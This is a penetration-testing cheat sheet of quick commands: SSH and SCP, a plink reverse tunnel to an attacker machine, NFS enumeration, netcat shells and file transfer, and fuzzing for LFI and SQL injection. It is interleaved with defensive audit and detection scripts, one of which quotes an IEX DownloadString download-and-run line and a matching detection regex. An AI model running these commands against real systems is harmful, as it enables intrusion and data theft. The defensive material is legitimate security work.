Quick Scripts
Quick Snippets to use in a pinch
SSH
Using an id_rsa key to log in to a target. Note that you must have the key's passphrase for this to work
ssh -i id_rsa User@IP #the key file must not be readable by others (chmod 600 id_rsa) or ssh refuses it
SCP
SCP is a great method of transferring files to and from the target in a pinch
scp -r User@IP:~/Dir ~/LocalDir #pull; -r is needed to copy a whole directory
scp LocalFile User@IP:~/RemoteDir/File #push a single file
PLINK
Plink is a tool that's part of the PuTTY suite; it allows SSH tunnelling and, in our use case, port forwarding. Once plink is on the target we first find the port we want to forward
netstat -ano #list listening ports and the PID that owns each
and then forward the port to our machine, which should have an SSH server running
.\plink.exe -l AttackerMachineUserName -pw AttackerMachinePassword -R TargetMachinePort:127.0.0.1:AttackMachinePort AttackMachineIP
.\plink.exe -l hn -pw hn -R 5985:127.0.0.1:5985 10.10.10.10
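The -R forward above only works because the SSH server that plink connects to permits remote forwarding. The following is an added example (not from the original notes) that audits the sshd_config settings controlling that, in POSIX shell: the config texts are constructed for the demo, and the defaults assumed (AllowTcpForwarding yes, GatewayPorts no, PasswordAuthentication yes) are OpenSSH's documented defaults.

```shell
# Added example: audit an sshd_config for the settings that decide whether a
# remote (-R) port forward like the plink command above is accepted.
# Both config texts are constructed for this demo.
SAMPLE_SSHD_CONFIG='# constructed sample sshd_config (weak)
Port 22
PermitRootLogin no
AllowTcpForwarding yes
GatewayPorts yes
PasswordAuthentication yes
'

HARDENED_SSHD_CONFIG='# constructed sample sshd_config (hardened)
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PasswordAuthentication no
'

# effective_setting CONFIG_TEXT KEY DEFAULT
# Prints the value of KEY ("Key value" form); the first match wins, as in sshd.
# Commented-out or absent keys fall back to DEFAULT (sshd's built-in default).
effective_setting() {
    _cfg=$1; _key=$2; _def=$3
    _val=$(printf '%s\n' "$_cfg" \
        | awk -v k="$_key" 'tolower($1) == tolower(k) { print $2; exit }')
    [ -n "$_val" ] && printf '%s\n' "$_val" || printf '%s\n' "$_def"
}

# audit_forwarding CONFIG_TEXT
# Prints one line per finding; prints nothing for a hardened config.
audit_forwarding() {
    _cfg=$1
    _fwd=$(effective_setting "$_cfg" AllowTcpForwarding yes)
    _gw=$(effective_setting "$_cfg" GatewayPorts no)
    _pw=$(effective_setting "$_cfg" PasswordAuthentication yes)
    case "$_fwd" in
        yes|all|remote)
            echo "AllowTcpForwarding $_fwd: -R tunnels are accepted; set 'AllowTcpForwarding no' (or 'local') where tunnels are not needed" ;;
    esac
    case "$_gw" in
        yes|clientspecified)
            echo "GatewayPorts $_gw: forwarded ports may bind on all interfaces instead of loopback only; set 'GatewayPorts no'" ;;
    esac
    if [ "$_pw" = yes ]; then
        echo "PasswordAuthentication yes: a leaked password is enough to open a tunnel; prefer key-only authentication"
    fi
}

# Usage: three findings for the weak sample, none for the hardened one
audit_forwarding "$SAMPLE_SSHD_CONFIG"
audit_forwarding "$HARDENED_SSHD_CONFIG"
```

Run it against a real file with `audit_forwarding "$(cat /etc/ssh/sshd_config)"`; Match blocks are not handled, so a setting overridden inside a Match block needs a manual look.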
NFS Mounts
NFS mounts can sometimes be found on targets and can provide essential information about the target.
They are usually advertised through rpcbind, which shows up in a port scan as:
PORT STATE SERVICE
111/tcp open rpcbind
Enumeration
showmount -e IP #List Mounts
nmap -sV --script=nfs-showmount IP #Nmap List Mounts
nmap -sV --script=nfs-statfs IP #Nmap get mount statistics
nmap -sV --script=nfs-ls IP #Nmap list mounts and permissions
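As an added example (not part of the original notes), here is a small POSIX shell parser for `showmount -e` style output that picks out the exports which are reachable from any host, i.e. the ones a defender would want to restrict to a client list. The showmount output below is constructed for the demo; the `*` and `(everyone)` spellings are the two forms showmount uses for unrestricted exports.

```shell
# Added example: find world-reachable NFS exports in `showmount -e` output.
# The text below is constructed to look like showmount output; it is not a real host.
SAMPLE_SHOWMOUNT='Export list for 10.10.10.10:
/srv/backup  *
/home        10.10.10.0/24
/var/nfs     *.corp.example,10.0.0.5
/export/pub  (everyone)
'

# parse_exports TEXT
# Prints "path<TAB>clients" per export, skipping the "Export list for" header.
parse_exports() {
    printf '%s\n' "$1" | awk 'NR > 1 && NF >= 2 { print $1 "\t" $2 }'
}

# open_exports TEXT
# Prints only the exports whose client list allows any host. A wildcard domain
# such as *.corp.example is still a restriction, so it is not flagged.
open_exports() {
    parse_exports "$1" | awk -F '\t' '
        {
            n = split($2, c, ",")
            for (i = 1; i <= n; i++)
                if (c[i] == "*" || c[i] == "(everyone)") { print $1; break }
        }'
}

# count_open_exports TEXT: number of world-reachable exports
count_open_exports() {
    open_exports "$1" | grep -c ''
}

# Usage: prints /srv/backup and /export/pub for the constructed sample
open_exports "$SAMPLE_SHOWMOUNT"
```

Feed it live output with `open_exports "$(showmount -e IP)"`. Anything it prints should be narrowed to specific hosts or subnets in /etc/exports, and kept on root_squash so a client's root does not map to root on the export.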
Local Mount
NFS Mounts can also be mounted locally
mount -t nfs IP:/NFSMountName /LocalMountLocation
mount #Lists locally mounted directories
umount IP:/NFSMountName #unmounts mounted NFS Directory
NFS mounts can often be huge and take a while to transfer (especially over an unstable network), so it's advisable to use rsync to pull the files on them down
rsync -anv /NFSMountLocation/ /LocalExistingDir #-a archive mode, -v verbose; -n is a dry run that only lists what would be copied, drop it to transfer
Powershell
Powershell Console History
C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
PowerShell is a very useful scripting language akin to bash; more information about its modules can be found at https://docs.microsoft.com/en-us/powershell/module/
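The PSReadLine directory above holds ConsoleHost_history.txt, a plain-text record of every interactive command a user typed, which makes it a useful artefact when reviewing a machine. The following is an added example (not from the original notes): a POSIX shell scan that flags history lines matching patterns commonly seen in abuse (encoded commands, in-memory download-and-run, execution policy bypass). The history text is constructed for the demo, and the pattern list is a starting point to extend, not a complete signature set.

```shell
# Added example: flag suspicious lines in a PSReadLine ConsoleHost_history.txt.
# The history below is constructed for this demo (192.0.2.10 is a documentation
# address and the base64 blob is a meaningless placeholder).
SAMPLE_HISTORY='Get-ChildItem C:\Users
Get-Process | Sort-Object CPU -Descending
powershell -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUA==
IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/a.ps1")
Set-ExecutionPolicy Bypass -Scope Process
Get-Date
'

# Extended regex, matched case-insensitively. Each alternative is one pattern:
#   Invoke-Expression / IEX   - runs a string as code
#   DownloadString/File       - fetches code over the network
#   FromBase64String          - decodes an embedded payload
#   ExecutionPolicy Bypass    - disables the script policy for the session
#   -e/-ec/-enc/-EncodedCommand - base64-encoded command line
#   -w hidden                 - hides the console window
SUSPICIOUS_RE='invoke-expression|(^|[ ;(])iex([ ;(]|$)|downloadstring|downloadfile|frombase64string|executionpolicy +bypass|-ep +bypass|-(e|ec|enc|encodedcommand)( |$)|-w(indowstyle)? +hidden'

# flag_history TEXT
# Prints "lineNumber:command" for each matching line; exits 0 even with no matches.
flag_history() {
    printf '%s\n' "$1" | grep -inE -e "$SUSPICIOUS_RE" || true
}

# count_flagged TEXT: number of flagged lines
count_flagged() {
    flag_history "$1" | grep -c ''
}

# Usage: lines 3, 4 and 5 of the constructed sample are flagged
flag_history "$SAMPLE_HISTORY"
```

On a mounted Windows image, run it per user with `flag_history "$(cat "/mnt/c/Users/NAME/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt")"` (path as above, adjusted to the mount point). The file records interactive sessions only; scripts and commands run non-interactively do not appear, so an empty or clean history is not proof that nothing ran.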
CMD
Output file content
type filename.txt
Other useful commands (these commands work in PowerShell as well)
dir /a #list files with full attributes, including hidden files
cmd /k #useful inline with payloads, runs & keeps payload alive
whoami /priv #list the current user's privileges
net user #list accounts
net user %USERNAME% #information about current account
net group #view Domain Groups
NetCat
Netcat is a tool that allows for simple shells
nc -lnvp PORT #start netcat listener (-l listen, -n no DNS, -v verbose, -p port)
nc IP PORT #use netcat to connect to a defined target
Netcat unfortunately isn't native on Windows, but we can still get it from https://eternallybored.org/misc/netcat/ and it works the same way!
Netcat can also be used for transferring files
nc -l -p 1234 > out.file #receiver
cat file | nc -w 3 IP PORT #sender
Fuzzing
Fuzzing is very useful for finding files that have a known name but no known location; we can use fuzzing to find the path by substituting candidates into a pre-existing URL. Fuzzing can also be used for exploiting LFI as well as SQL vulnerabilities
wfuzz -c -w 'wordlist' -u 'http://IP/file.php?id=FUZZ'
ffuf -u http://IP/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,204,301,302,307,401 -o results.txt #-mc keeps only these response codes
DirBusting
Dirbusting can be considered a form of fuzzing, but it checks for whole directories and files; one such tool we can use for this is GoBuster
gobuster dir -u http://IP/ -w DirBuster-Lists/directory-list-2.3-medium.txt
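Seen from the web server, the wfuzz, ffuf and gobuster runs above all look the same: one client producing a burst of 404s across many distinct paths. As an added example (not from the original notes), here is a POSIX shell detection over combined-format access log lines that counts 404s and distinct missed paths per client and reports the clients over a threshold. The log lines are constructed for the demo (198.51.100.0/24 and 203.0.113.0/24 are documentation ranges), and the gobuster User-Agent in them is only decoration: tools can set any User-Agent, so the 404 rate is the signal, not the UA string.

```shell
# Added example: detect directory brute-forcing in a combined-format access log.
# The log below is constructed for this demo.
SAMPLE_ACCESS_LOG='198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /admin HTTP/1.1" 404 196 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /backup HTTP/1.1" 404 196 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /config HTTP/1.1" 404 196 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:38 +0000] "GET /uploads HTTP/1.1" 301 0 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:38 +0000] "GET /test HTTP/1.1" 404 196 "-" "gobuster/3.1"
203.0.113.9 - - [10/Oct/2023:13:55:38 +0000] "GET /old HTTP/1.1" 404 196 "-" "gobuster/3.1"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
'

# not_found_per_ip LOG
# In the combined format the fields are: $1 client IP, $6 method, $7 path, $9 status.
# Prints "404count distinctPaths ip" per client, highest count first.
not_found_per_ip() {
    printf '%s\n' "$1" | awk '
        $9 == 404 {
            n[$1]++
            if (!seen[$1 SUBSEP $7]++) d[$1]++
        }
        END { for (ip in n) print n[ip], d[ip], ip }' | sort -rn
}

# brute_force_sources LOG THRESHOLD
# Prints the client IPs with at least THRESHOLD 404 responses.
brute_force_sources() {
    not_found_per_ip "$1" | awk -v t="$2" '$1 >= t { print $3 }'
}

# Usage: only 203.0.113.9 crosses a threshold of 5 in the constructed sample
brute_force_sources "$SAMPLE_ACCESS_LOG" 5
```

Against a real log use `brute_force_sources "$(cat /var/log/apache2/access.log)" 50` and tune the threshold to the site; a single user reloading a broken page produces many 404s on one path, which is why the distinct-path column is printed alongside the count.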
Python
Simple HTTP server for quickly hosting files (Python 2 module; on Python 3 the equivalent is the http.server module)
python -m SimpleHTTPServer 8088
C#
C# binaries can be decompiled with dnSpy (https://github.com/0xd4d/dnSpy) and can be compiled with https://dotnetfiddle.net/